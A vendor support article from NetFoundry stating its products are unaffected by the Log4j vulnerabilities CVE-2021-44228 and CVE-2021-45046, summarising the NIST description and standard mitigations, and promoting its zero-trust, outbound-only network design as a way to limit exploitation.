NetFoundry Zero Trust Network protects against the Apache Log4j Critical Vulnerability


NetFoundry software does not use Apache log4j. No NetFoundry product is vulnerable to the exploitation of CVE-2021-44228. As log4J use is a prerequisite for CVE-2021-45046, no NetFoundry product is affected by this additional vulnerability. In addition, NetFoundry's Secure by Design architecture helps mitigate the threat for systems which do use Apache log4j.

Details of the CVE-2021-44228 Vulnerability From NIST:

This CVE is a severity 10 (the highest). Any device that's exposed to networks is potentially at risk if it's running Apache Log4J, versions 2.0 to 2.14.1. Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

NetFoundry Mitigation of CVE-2021-44228

In the case of CVE-2021-44228, mitigation could be achieved by the core NetFoundry Secure by Design implementation of closed inbound firewall ports, least privileged access based on strong identities and the establishment of outbound only, authorized sessions to the private NetFoundry Fabric routers, solely for the necessary flows for the solution. Like many exploits, the most effective use of the log4j vulnerability involves the retrieval of additional code and command and control functionality. The usual flow is to create a specially crafted log entry causing the server to download and execute additional code. With the solution described above, the logging server should not be able to communicate with this entity to download the additional code. We describe this architecture in more detail below.

NetFoundry's Secure by Design protection

Log4j is another example that in today's world, the methods of exploitation of vulnerabilities travel faster than the patches and update procedures of users and companies around the world. Often, when the vendor or project of a vulnerable software package produces a patch, some of the users are left to close the barn door and clean up the mess already made by attackers exploiting the software. Reactive security is no longer good enough.

However, with NetFoundry's unique Secure by Design architecture, the barn door is always closed, proactively. In fact, most can't even see the barn. Inbound firewall ports are closed and IP addresses are no longer exposed - this is nearly impossible with a solution that doesn't have NetFoundry's architecture and components. This private, authenticate before connect architecture, enforced with strong identities and least privileged access to Private Fabric Routers, minimizes the attack surface.

This approach proactively disrupts the tactics and techniques used by malicious actors - rather than reacting to the attacks. As defined by MITRE ATT&CK, this NetFoundry approach acts early to disrupt the Reconnaissance and Initial Access Tactics by making targeted applications unreachable from the networks (Secure by Design). These tactics are critical to proactively preventing breaches - for example, new zero-day vulnerabilities are (by definition) exploited before there are patches, and of course before orgs can apply any patches...they, therefore, require a Secure by Design approach. Rather than be stuck in a race against time, a NetFoundry Secure by Design organization has mitigated the risk by taking every measure to ensure the attack can't reach the vulnerability, to begin with. This significantly reduces the overall risk to the enterprise while they carry out their patching or upgrade procedures. Of course, breaches are always possible, and so the NetFoundry solution is also designed to minimize the blast radius of a successful exploit within a network and isolate it - for example, not allowing hostile software the access to 'call home' or spread through a network.

Was this article helpful?
3 out of 6 found this helpful



Please sign in to leave a comment.